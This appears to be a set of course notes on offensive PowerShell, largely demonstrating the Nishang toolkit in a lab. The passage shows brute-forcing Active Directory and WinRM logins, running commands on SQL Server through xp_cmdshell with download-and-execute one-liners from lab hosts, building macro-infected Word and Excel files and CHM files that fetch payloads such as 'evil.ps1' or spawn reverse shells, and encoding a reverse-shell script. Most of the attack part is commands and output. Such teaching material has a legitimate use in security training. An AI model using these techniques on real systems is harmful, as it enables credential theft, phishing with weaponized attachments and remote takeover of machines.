ToUInt64 Method uint64 IConvertible.ToUInt64(System.IFormatProvider provider) ToUpper Method string ToUpper(), string ToUpper(cultureinfo culture) ToUpperInvariant Method string ToUpperInvariant() Trim Method string Trim(Params char[] trimChars), string Trim() TrimEnd Method string TrimEnd(Params char[] trimChars) TrimStart Method string TrimStart(Params char[] trimChars) Chars ParameterizedProperty char Chars(int index) {get;} Length Property int Length {get;} TypeName: System.Xml.XmlElement Name MemberType Definition ---- ---------- ---------- ToString CodeMethod static string XmlNode(psobject instance) AppendChild Method System.Xml.XmlNode AppendChild(System.Xml.XmlNode newChild) Clone Method System.Xml.XmlNode Clone(), System.Object ICloneable.Clone() CloneNode Method System.Xml.XmlNode CloneNode(bool deep) CreateNavigator Method System.Xml.XPath.XPathNavigator CreateNavigator(), System.Xml.XPath.XPathNavigator IXPathNavigable.CreateNavigator() Equals Method bool Equals(System.Object obj) GetAttribute Method string GetAttribute(string name), string GetAttribute(string localName, string namespaceURI) GetAttributeNode Method System.Xml.XmlAttribute GetAttributeNode(string name), System.Xml.XmlAttribute GetAttributeNode(string localName, string namespaceURI) GetElementsByTagName Method System.Xml.XmlNodeList GetElementsByTagName(string name), System.Xml.XmlNodeList GetElementsByTagName(string localName, string namespaceURI) GetEnumerator Method System.Collections.IEnumerator GetEnumerator(), System.Collections.IEnumerator IEnumerable.GetEnumerator() GetHashCode Method int GetHashCode() GetNamespaceOfPrefix Method string GetNamespaceOfPrefix(string prefix) GetPrefixOfNamespace Method string GetPrefixOfNamespace(string namespaceURI) GetType Method type GetType() HasAttribute Method bool HasAttribute(string name), bool HasAttribute(string localName, string namespaceURI) InsertAfter Method System.Xml.XmlNode InsertAfter(System.Xml.XmlNode newChild, System.Xml.XmlNode refChild) InsertBefore Method System.Xml.XmlNode InsertBefore(System.Xml.XmlNode newChild, System.Xml.XmlNode refChild) Normalize Method void Normalize() PrependChild Method System.Xml.XmlNode PrependChild(System.Xml.XmlNode newChild) RemoveAll Method void RemoveAll() RemoveAllAttributes Method void RemoveAllAttributes() RemoveAttribute Method void RemoveAttribute(string name), void RemoveAttribute(string localName, string namespaceURI) RemoveAttributeAt Method System.Xml.XmlNode RemoveAttributeAt(int i) RemoveAttributeNode Method System.Xml.XmlAttribute RemoveAttributeNode(System.Xml.XmlAttribute oldAttr), System.Xml.XmlAttribute RemoveAttributeNode(string localName, string namespace... RemoveChild Method System.Xml.XmlNode RemoveChild(System.Xml.XmlNode oldChild) ReplaceChild Method System.Xml.XmlNode ReplaceChild(System.Xml.XmlNode newChild, System.Xml.XmlNode oldChild) SelectNodes Method System.Xml.XmlNodeList SelectNodes(string xpath), System.Xml.XmlNodeList SelectNodes(string xpath, System.Xml.XmlNamespaceManager nsmgr) SelectSingleNode Method System.Xml.XmlNode SelectSingleNode(string xpath), System.Xml.XmlNode SelectSingleNode(string xpath, System.Xml.XmlNamespaceManager nsmgr) SetAttribute Method void SetAttribute(string name, string value), string SetAttribute(string localName, string namespaceURI, string value) SetAttributeNode Method System.Xml.XmlAttribute SetAttributeNode(System.Xml.XmlAttribute newAttr), System.Xml.XmlAttribute SetAttributeNode(string localName, string namespaceURI) Supports Method bool Supports(string feature, string version) WriteContentTo Method void WriteContentTo(System.Xml.XmlWriter w) WriteTo Method void WriteTo(System.Xml.XmlWriter w) Item ParameterizedProperty System.Xml.XmlElement Item(string name) {get;}, System.Xml.XmlElement Item(string localname, string ns) {get;} args Property string args {get;set;} debugging Property System.Xml.XmlElement debugging {get;} host Property System.Object[] host {get;} runstats Property System.Xml.XmlElement runstats {get;} scaninfo Property System.Xml.XmlElement scaninfo {get;} scanner Property string scanner {get;set;} start Property string start {get;set;} startstr Property string startstr {get;set;} taskbegin Property System.Object[] taskbegin {get;} taskend Property System.Object[] taskend {get;} verbose Property System.Xml.XmlElement verbose {get;} version Property string version {get;set;} xmloutputversion Property string xmloutputversion {get;set;} PS C:\Users\Administrator\Desktop> ``` ```PowerShell PS C:\Users\Administrator\Desktop> $nmap.nmaprun.host status address ------ ------- status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status address status {address, address} status {address, address} status {address, address} status {address, address} status {address, address} status {address, address} status {address, address} status address PS C:\Users\Administrator\Desktop> ``` ```PowerShell PS C:\Users\Administrator\Desktop> $nmap.nmaprun.host.Address OverloadDefinitions ------------------- System.Object&, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 Address(int ) PS C:\Users\Administrator\Desktop> $nmap.nmaprun.host.status state reason reason_ttl ----- ------ ---------- down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 down no-response 0 up arp-response 0 up arp-response 0 up arp-response 0 up arp-response 0 up arp-response 0 up arp-response 0 up arp-response 0 up user-set 0 PS C:\Users\Administrator\Desktop> ``` - Automating Nessus and parsing reports - [Posh-NVS](https://github.com/darkoperator/Posh-NVS) ###### Interesting Reads - [ScanDiff](https://github.com/hardwaterhacker/scandiff) - Parse nmap XML with Powershell - [Link 1](https://cyber-defense.sans.org/blog/2009/06/11/powershell-script-to-parse-nmap-xml-output/) - [Link 2](https://poshsecurity.com/blog/2011/8/23/automating-nmap-analysis-with-powershell.html) - Automating Nessus with Posh-SecMod - [Link 1](https://www.darkoperator.com/blog/2013/4/15/using-posh-secmod-to-automate-nessus-part1.html) - [Link 2](https://www.darkoperator.com/blog/2013/4/16/using-posh-secmod-powershell-module-to-automate-nessus-part.html) ================================================ FILE: 43-Bruteforce-Part-1.md ================================================ #### 43. Bruteforce Part 1 ###### Brute-Forcing - Brute-Force in Nishang: - Active Directory - FTP - MSSQL Server - Sharepoint - Attacking machine must be a part of the domain ```PowerShell PS C:\> Enter-PSSession -ComputerName WIN-2012-DC -Credential PFPT\Administrator ``` ```PowerShell [win-2012-dc]: PS C:\Users\Administrator\Documents> cd .. [win-2012-dc]: PS C:\Users\Administrator> cd .\Desktop [win-2012-dc]: PS C:\Users\Administrator\Desktop> cd .\nishang-master [win-2012-dc]: PS C:\Users\Administrator\Desktop\nishang-master> Import-Module .\nishang.psm1 WARNING: The names of some imported commands from the module 'nishang' include unapproved verbs that might make them less discoverable. To find the commands with unapproved verbs, run the Import-Module command again with the Verbose parameter. For a list of approved verbs, type Get-Verb. WARNING: Some imported command names contain one or more of the following restricted characters: # , ( ) {{ }} [ ] & - / \ $ ^ ; : " ' < > | ? @ ` * % + = ~ [win-2012-dc]: PS C:\Users\Administrator\Desktop\nishang-master> ``` ```PowerShell [win-2012-dc]: PS C:\Users\Administrator\Desktop\nishang-master> Get-Command -Module nishang CommandType Name ModuleName ----------- ---- ---------- Function Add-Exfiltration nishang Function Add-Persistence nishang Function Add-RegBackdoor nishang Function Add-ScrnSaveBackdoor nishang Function Base64ToString nishang Function Check-VM nishang Function ConvertTo-ROT13 nishang Function Copy-VSS nishang Function Create-MultipleSessions nishang Function DNS_TXT_Pwnage nishang Function Do-Exfiltration nishang Function Download nishang Function Download_Execute nishang Function Download-Execute-PS nishang Function Enable-DuplicateToken nishang Function Execute-Command-MSSQL nishang Function Execute-DNSTXT-Code nishang Function Execute-OnTime nishang Function ExetoText nishang Function FireBuster nishang Function FireListener nishang Function Get-Information nishang Function Get-LsaSecret nishang Function Get-PassHashes nishang Function Get-PassHints nishang Function Get-Unconstrained nishang Function Get-WebCredentials nishang Function Get-Wlan-Keys nishang Function Get-WmiShellOutput nishang Function Gupt-Backdoor nishang Function HTTP-Backdoor nishang Function Invoke-ADSBackdoor nishang Function Invoke-AmsiBypass nishang Function Invoke-BruteForce nishang Function Invoke-CredentialsPhish nishang Function Invoke-Decode nishang Function Invoke-Encode nishang Function Invoke-Interceptor nishang Function Invoke-JSRatRegsvr nishang Function Invoke-JSRatRundll nishang Function Invoke-Mimikatz nishang Function Invoke-MimikatzWDigestDowngrade nishang Function Invoke-Mimikittenz nishang Function Invoke-NetworkRelay nishang Function Invoke-PortScan nishang Function Invoke-PoshRatHttp nishang Function Invoke-PoshRatHttps nishang Function Invoke-PowerShellIcmp nishang Function Invoke-PowerShellTcp nishang Function Invoke-PowerShellUdp nishang Function Invoke-PowerShellWmi nishang Function Invoke-Prasadhak nishang Function Invoke-PSGcat nishang Function Invoke-PsGcatAgent nishang Function Invoke-PsUACme nishang Function Invoke-SSIDExfil nishang Function Out-CHM nishang Function Out-DnsTxt nishang Function Out-Excel nishang Function Out-HTA nishang Function Out-Java nishang Function Out-JS nishang Function Out-RundllCommand nishang Function Out-SCF nishang Function Out-SCT nishang Function Out-Shortcut nishang Function Out-WebQuery nishang Function Out-Word nishang Function Parse_Keys nishang Function Remove-Persistence nishang Function Remove-PoshRat nishang Function Remove-Update nishang Function Run-EXEonRemote nishang Function Show-TargetScreen nishang Function Speak nishang Function Start-CaptureServer nishang Function StringtoBase64 nishang Function TexttoEXE nishang [win-2012-dc]: PS C:\Users\Administrator\Desktop\nishang-master> ``` ```PowerShell [win-2012-dc]: PS C:\Users\Administrator\Desktop\nishang-master> Get-Help Invoke-BruteForce -Examples NAME Invoke-BruteForce SYNOPSIS Nishang payload which performs a Brute-Force Attack against SQL Server, Active Directory, Web and FTP. -------------------------- EXAMPLE 1 -------------------------- PS >Invoke-BruteForce -ComputerName SQLServ01 -UserList C:\test\users.txt -PasswordList C:\test\wordlist.txt -Service SQL -Verbose Brute force a SQL Server SQLServ01 for users listed in users.txt and passwords in wordlist.txt -------------------------- EXAMPLE 2 -------------------------- PS >Invoke-BruteForce -ComputerName targetdomain.com -UserList C:\test\users.txt -PasswordList C:\test\wordlist.txt -Service ActiveDirectory -StopOnSuccess -Verbose Brute force a Domain Controller of targetdomain.com for users listed in users.txt and passwords in wordlist.txt. Since StopOnSuccess is specified, the brute forcing stops on first success. -------------------------- EXAMPLE 3 -------------------------- PS >cat C:\test\servers.txt | Invoke-BruteForce -UserList C:\test\users.txt -PasswordList C:\test\wordlist.txt -Service SQL -Verbose Brute force SQL Service on all the servers specified in servers.txt [win-2012-dc]: PS C:\Users\Administrator\Desktop\nishang-master> ``` ```PowerShell [win-2012-dc]: PS C:\Users\Administrator\Desktop\nishang-master> Invoke-BruteForce -ComputerName WIN-2012-DC -UserList ..\user.txt -PasswordList ..\500-worst-passwords.txt -Service ActiveDirectory Brute Forcing Active Directory WIN-2012-DC [win-2012-dc]: PS C:\Users\Administrator\Desktop\nishang-master> ``` ================================================ FILE: 44-Bruteforce-Part-2.md ================================================ #### 44. Bruteforce Part 2 ###### Brute Forcing - [```Get-WinRMPassword```](https://poshsecurity.com/blog/2014/3/20/powershell-winrm-get-winrmpassword.html) ```PowerShell PS C:\Users\Administrator\Desktop> . .\Get-WinRMPassword.ps1 ``` ```PowerShell PS C:\Users\Administrator\Desktop> Get-Help Get-WinRMPassword -Examples NAME Get-WinRMPassword SYNOPSIS Simple bruteforce attack upon a Windows machine running WinRM -------------------------- EXAMPLE 1 -------------------------- C:\PS>get-winrmpassword -UserName Administrator -ComputerName myvictim -WordList c:\mywordlist.txt Will read mywordlist.txt and for each entry in that list, try Administrator: PS C:\Users\Administrator\Desktop> ``` ```PowerShell PS C:\Users\Administrator\Desktop> Get-WinRMPassword -username John -ComputerName JOHN-PC -wordlist .\pass.txt You cannot call a method on a null-valued expression. At C:\Users\Administrator\Desktop\Get-WinRMPassword.ps1:85 char:12 + } elseif (-not $ourerror.ErrorDetails.Message.Contains("The user name or passwo ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : InvalidOperation: (:) [], RuntimeException + FullyQualifiedErrorId : InvokeMethodOnNull Password Found: Ab12345 PS C:\Users\Administrator\Desktop> ``` ```PowerShell PS C:\Users\Administrator\Desktop> Get-WinRMPassword -username John -ComputerName JOHN-PC -wordlist .\pass.txt -Verbose VERBOSE: Trying Administrator You cannot call a method on a null-valued expression. At C:\Users\Administrator\Desktop\Get-WinRMPassword.ps1:85 char:12 + } elseif (-not $ourerror.ErrorDetails.Message.Contains("The user name or passwo ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : InvalidOperation: (:) [], RuntimeException + FullyQualifiedErrorId : InvokeMethodOnNull VERBOSE: Trying Ab12345 Password Found: Ab12345 PS C:\Users\Administrator\Desktop> ``` - ```Get-WmiPassword``` ```PowerShell Get-WmiPassword -username John -ComputerName JOHN-PC -wordlist .\pass.txt ``` ================================================ FILE: 45-Exploitation-Executing-Scripts-on-MySQL.md ================================================ #### 45. Exploitation: Executing Scripts on MySQL ###### Install SQL Server - [SQL Server 2012 - Installation step by step](https://www.youtube.com/watch?v=4WEFTQ3VJNg) - [How to install SQL Server 2012 on Windows Server 2012 R2 (VMware workstation 9.0)](https://www.youtube.com/watch?v=A-Nq9YDJPas) ###### Execute-Command-MSSQL ```PowerShell PS C:\Users\Administrator\Desktop\nishang-master> Import-Module .\nishang.psm1 WARNING: The names of some imported commands from the module 'nishang' include unapproved verbs that might make them less discoverable. To find the commands with unapprov command again with the Verbose parameter. For a list of approved verbs, type Get-Verb. WARNING: Some imported command names contain one or more of the following restricted characters: # , ( ) {{ }} [ ] & - / \ $ ^ ; : " ' < > | ? @ ` * % + = ~ PS C:\Users\Administrator\Desktop\nishang-master> ``` ```PowerShell PS C:\Users\Administrator\Desktop\nishang-master> Get-Help Execute-Command-MSSQL -Examples NAME Execute-Command-MSSQL SYNOPSIS Nishang payload which could be used to execute commands remotely on a MS SQL server. -------------------------- EXAMPLE 1 -------------------------- PS>Execute-Command-MSSQL -ComputerName sqlserv01 -UserName sa -Password sa1234 -------------------------- EXAMPLE 2 -------------------------- PS>Execute-Command-MSSQL -ComputerName 192.168.1.10 -UserName sa -Password sa1234 -------------------------- EXAMPLE 3 -------------------------- PS>Execute-Command-MSSQL -ComputerName target -UserName sa -Password sa1234 Connecting to target... Enabling XP_CMDSHELL... Do you want a PowerShell shell (P) or a SQL Shell (S) or a cmd shell (C): P Starting PowerShell on the target.. PS target> iex ((New-Object Net.Webclient).downloadstring(''http://192.168.254.1/Get-Information.ps1''));Get-Information Use above to execute scripts on a target. PS C:\Users\Administrator\Desktop\nishang-master> ``` ```PowerShell PS C:\> iex (New-Object Net.Webclient).DownloadString("http://10.0.0.129:8000/log.txt") Contents of file PS C:\> ``` - ```log.txt``` file contents ``` http://10.0.0.129:8000/log.txt ``` ``` "Contents of file" ``` - [Reading the contents of a remote file using Powershell](https://stackoverflow.com/questions/1973880/download-url-content) ================================================ FILE: 46-Client-Side-Attacks-Part-1.md ================================================ #### 46. Client Side Attacks Part 1 ###### Client Side Attacks - Malicious/Weaponized Attachments - Out-Word - Out-Excel ```PowerShell PS C:\Users\Administrator\Desktop\nishang-master> Import-Module .\nishang.psm1 WARNING: The names of some imported commands from the module 'nishang' include unapproved verbs that might make them less discoverable. To find the commands with unapproved verbs, run the Import-Module command again with the Verbose parameter. For a list of approved verbs, type Get-Verb. WARNING: Some imported command names contain one or more of the following restricted characters: # , ( ) {{ }} [ ] & - / \ $ ^ ; : " ' < > | ? @ ` * % + = ~ PS C:\Users\Administrator\Desktop\nishang-master> ``` ```PowerShell PS C:\Users\Administrator\Desktop\nishang-master> Get-Help Out-Excel -Examples NAME Out-Excel SYNOPSIS Nishang Script which can generate and "infect" existing excel files with an auto executable macro. -------------------------- EXAMPLE 1 -------------------------- PS >Out-Excel -Payload "powershell.exe -ExecutionPolicy Bypass -noprofile -noexit -c Get-Process" -RemainSafe Use above command to provide your own payload to be executed from macro. A file named "Salary_Details.doc" would be generated in the current directory. -------------------------- EXAMPLE 2 -------------------------- PS >Out-Excel -PayloadScript C:\nishang\Shells\Invoke-PowerShellTcpOneLine.ps1 Use above when you want to use a PowerShell script as the payload. Note that if the script expects any parameter passed to it, you must pass the parameters in the script itself. A file named "Salary_Details.doc" would be generated in the current directory with the script used as encoded payload. -------------------------- EXAMPLE 3 -------------------------- PS >Out-Excel -PayloadURL http://yourwebserver.com/evil.ps1 Use above when you want to use the default payload, which is a powershell download and execute one-liner. A file named "Salary_Details.doc" would be generated in the current directory. -------------------------- EXAMPLE 4 -------------------------- PS >Out-Excel -PayloadURL http://yourwebserver.com/evil.ps1 -Arguments Evil Use above when you want to use the default payload, which is a powershell download and execute one-liner. The Arugment parameter allows to pass arguments to the downloaded script. -------------------------- EXAMPLE 5 -------------------------- PS >Out-Excel -PayloadURL http://yourwebserver.com/Powerpreter.psm1 -Arguments "Invoke-PsUACMe;Get-WLAN-Keys" Use above for multiple payloads. The idea is to use a script or module as payload which loads multiple functions. -------------------------- EXAMPLE 6 -------------------------- PS >Out-Excel -PayloadURL http://yourwebserver.com/evil.ps1 -OutputFile C:\docfiles\Generated.doc In above, the output file would be saved to the given path. -------------------------- EXAMPLE 7 -------------------------- PS >Out-Excel -PayloadURL http://yourwebserver.com/evil.ps1 -ExcelFileDir C:\docfiles\ In above, in the C:\docfiles directory, macro enabled .doc files would be created for all the .docx files, with the same name and same Last MOdified Time. -------------------------- EXAMPLE 8 -------------------------- PS >Out-Excel -PayloadURL http://yourwebserver.com/evil.ps1 -ExcelFileDir C:\docfiles\ -Recurse The above command would search recursively for .docx files in C:\docfiles. -------------------------- EXAMPLE 9 -------------------------- PS >Out-Excel -PayloadURL http://yourwebserver.com/evil.ps1 -ExcelFileDir C:\docfiles\ -Recurse -RemoveDocx The above command would search recursively for .docx files in C:\docfiles, generate macro enabled .doc files and delete the original files. -------------------------- EXAMPLE 10 -------------------------- PS >Out-Excel -PayloadScript C:\nishang\Shells\Invoke-PowerShellTcpOneLine.ps1 -RemainSafe Out-Excel turns off Macro Security. Use -RemainSafe to turn it back on. PS C:\Users\Administrator\Desktop\nishang-master> ``` ```PowerShell PS C:\Users\Administrator\Desktop\nishang-master> Out-Excel "powershell.exe -noexit -c Get-Service" Saved to file C:\Users\Administrator\Desktop\nishang-master\Salary_Details.xls 0 PS C:\Users\Administrator\Desktop\nishang-master> ``` ```PowerShell PS C:\Users\Administrator\Desktop\nishang-master> ls .\Salary_Details.xls Directory: C:\Users\Administrator\Desktop\nishang-master Mode LastWriteTime Length Name ---- ------------- ------ ---- -a--- 7/17/2017 1:30 PM 29184 Salary_Details.xls PS C:\Users\Administrator\Desktop\nishang-master> ``` ![Image of Task Manager](images/16.jpeg) View → Macros → View Macros → Auto Open → Edit ![Image of Task Manager](images/17.jpeg) ```PowerShell PS C:\Users\Administrator\Desktop\nishang-master> Get-Help Out-Word -Examples NAME Out-Word SYNOPSIS Nishang Script which can generate as well as "infect" existing word files with an auto executable macro. -------------------------- EXAMPLE 1 -------------------------- PS >Out-Word -Payload "powershell.exe -ExecutionPolicy Bypass -noprofile -noexit -c Get-Process" -RemainSafe Use above command to provide your own payload to be executed from macro. A file named "Salary_Details.doc" would be generated in the current directory. -------------------------- EXAMPLE 2 -------------------------- PS >Out-Word -PayloadScript C:\nishang\Shells\Invoke-PowerShellTcpOneLine.ps1 Use above when you want to use a PowerShell script as the payload. Note that if the script expects any parameter passed to it, you must pass the parameters in the script itself. A file named "Salary_Details.doc" would be generated in the current directory with the script used as encoded payload. -------------------------- EXAMPLE 3 -------------------------- PS >Out-Word -PayloadURL http://yourwebserver.com/evil.ps1 Use above when you want to use the default payload, which is a powershell download and execute one-liner. A file named "Salary_Details.doc" would be generated in the current directory. -------------------------- EXAMPLE 4 -------------------------- PS >Out-Word -PayloadURL http://yourwebserver.com/evil.ps1 -Arguments Evil Use above when you want to use the default payload, which is a powershell download and execute one-liner. The Arugment parameter allows to pass arguments to the downloaded script. -------------------------- EXAMPLE 5 -------------------------- PS >Out-Word -PayloadURL http://yourwebserver.com/Powerpreter.psm1 -Arguments "Invoke-PsUACMe;Get-WLAN-Keys" Use above for multiple payloads. The idea is to use a script or module as payload which loads multiple functions. -------------------------- EXAMPLE 6 -------------------------- PS >Out-Word -PayloadURL http://yourwebserver.com/evil.ps1 -OutputFile C:\docfiles\Generated.doc In above, the output file would be saved to the given path. -------------------------- EXAMPLE 7 -------------------------- PS >Out-Word -PayloadURL http://yourwebserver.com/evil.ps1 -WordFileDir C:\docfiles\ In above, in the C:\docfiles directory, macro enabled .doc files would be created for all the .docx files, with the same name and same Last MOdified Time. -------------------------- EXAMPLE 8 -------------------------- PS >Out-Word -PayloadURL http://yourwebserver.com/evil.ps1 -WordFileDir C:\docfiles\ -Recurse The above command would search recursively for .docx files in C:\docfiles. -------------------------- EXAMPLE 9 -------------------------- PS >Out-Word -PayloadURL http://yourwebserver.com/evil.ps1 -WordFileDir C:\docfiles\ -Recurse -RemoveDocx The above command would search recursively for .docx files in C:\docfiles, generate macro enabled .doc files and delete the original files. -------------------------- EXAMPLE 10 -------------------------- PS >Out-Word -PayloadScript C:\nishang\Shells\Invoke-PowerShellTcpOneLine.ps1 -RemainSafe Out-Word turns off Macro Security. Use -RemainSafe to turn it back on. PS C:\Users\Administrator\Desktop\nishang-master> ``` ================================================ FILE: 47-Client-Side-Attacks-Part-2.md ================================================ #### 47. Client Side Attacks Part 2 ###### Malicious/Weaponized Attachments - Out-CHM - Out-Shortcut - Out-CHM ```PowerShell PS C:\Users\Administrator\Desktop\nishang-master> Import-Module .\nishang.psm1 WARNING: The names of some imported commands from the module 'nishang' include unapproved verbs that might make them less discoverable. To find the commands with unapproved verbs, run the Import-Module command again with the Verbose parameter. For a list of approved verbs, type Get-Verb. WARNING: Some imported command names contain one or more of the following restricted characters: # , ( ) {{ }} [ ] & - / \ $ ^ ; : " ' < > | ? @ ` * % + = ~ PS C:\Users\Administrator\Desktop\nishang-master> ``` ```PowerShell PS C:\Users\Administrator\Desktop\nishang-master> Get-Help Out-CHM -Examples NAME Out-CHM SYNOPSIS Nishang script useful for creating Compiled HTML Help file (.CHM) which could be used to run PowerShell commands and scripts. -------------------------- EXAMPLE 1 -------------------------- PS >Out-CHM -Payload "Get-Process" -HHCPath "C:\Program Files (x86)\HTML Help Workshop" Above command would execute Get-Process on the target machine when the CHM file is opened. -------------------------- EXAMPLE 2 -------------------------- PS >Out-CHM -PayloadScript C:\nishang\Shells\Invoke-PowerShellTcpOneLine.ps1 -HHCPath "C:\Program Files (x86)\HTML Help Workshop" Use above when you want to use a PowerShell script as the payload. Note that if the script expects any parameter passed to it, you must pass the parameters in the script itself. -------------------------- EXAMPLE 3 -------------------------- PS >Out-CHM -PayloadURL http://192.168.254.1/Get-Information.ps1 -HHCPath "C:\Program Files (x86)\HTML Help Workshop" Use above command to generate CHM file which download and execute the given PowerShell script in memory on target. -------------------------- EXAMPLE 4 -------------------------- PS >Out-CHM -Payload "-EncodedCommand <>" -HHCPath "C:\Program Files (x86)\HTML Help Workshop" Use above command to generate CHM file which executes the encoded command/script. Use Invoke-Encode from Nishang to encode the command or script. -------------------------- EXAMPLE 5 -------------------------- PS >Out-CHM -PayloadURL http://192.168.254.1/powerpreter.psm1 -Arguments Check-VM -HHCPath "C:\Program Files (x86)\HTML Help Workshop" Use above command to pass an argument to the PowerShell script/module. -------------------------- EXAMPLE 6 -------------------------- PS >Out-CHM -PayloadScript C:\nishang\Shells\Invoke-PowerShellTcpOneLine.ps1 Use above when you want to use a PowerShell script as the payload. Note that if the script expects any parameter passed to it, you must pass the parameters in the script itself. PS C:\Users\Administrator\Desktop\nishang-master> ``` ```PowerShell PS C:\Users\Administrator\Desktop\nishang-master> Out-CHM -Payload " -c Get-Process" -HHCPath 'C:\Program Files (x86)\HTML Help Workshop' Microsoft HTML Help Compiler 4.74.8702 Compiling c:\Users\Administrator\Desktop\nishang-master\doc.chm Compile time: 0 minutes, 0 seconds 2 Topics 4 Local links 4 Internet links 0 Graphics Created c:\Users\Administrator\Desktop\nishang-master\doc.chm, 13,430 bytes Compression increased file by 291 bytes. PS C:\Users\Administrator\Desktop\nishang-master> ``` ```PowerShell PS C:\Users\Administrator\Desktop\nishang-master> ls .\doc.chm Directory: C:\Users\Administrator\Desktop\nishang-master Mode LastWriteTime Length Name ---- ------------- ------ ---- -a--- 7/17/2017 1:52 PM 13430 doc.chm PS C:\Users\Administrator\Desktop\nishang-master> ``` [```mini-reverse.ps1```](https://gist.github.com/staaldraad/204928a6004e89553a8d3db0ce527fd5) ```PowerShell PS C:\Users\Administrator\Desktop\nishang-master> Invoke-Encode -DataToEncode ..\mini-reverse.ps1 -OutCommand Encoded data written to .\encoded.txt Encoded command written to .\encodedcommand.txt PS C:\Users\Administrator\Desktop\nishang-master> ``` ```PowerShell PS C:\Users\Administrator\Desktop\nishang-master> cat .\encodedcommand.txt SQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAgACgAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALg BEAGUAZgBsAGEAdABlAFMAdAByAGUAYQBtACAAKAAkACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACAAKAAsACQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAo 